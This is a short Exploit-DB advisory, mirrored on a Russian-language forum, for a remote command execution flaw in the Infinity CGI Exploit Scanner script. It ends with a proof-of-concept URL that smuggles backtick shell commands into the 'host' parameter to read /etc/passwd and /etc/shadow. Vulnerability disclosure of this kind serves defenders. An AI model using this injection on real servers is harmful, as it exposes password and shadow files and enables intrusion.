- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 22772
- Проверка EDB
-
- Пройдено
- Автор
- BADPACK3T
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- null
- Дата публикации
- 2003-06-12
Код:
source: https://www.securityfocus.com/bid/7913/info
Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.
http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0- Источник
- www.exploit-db.com
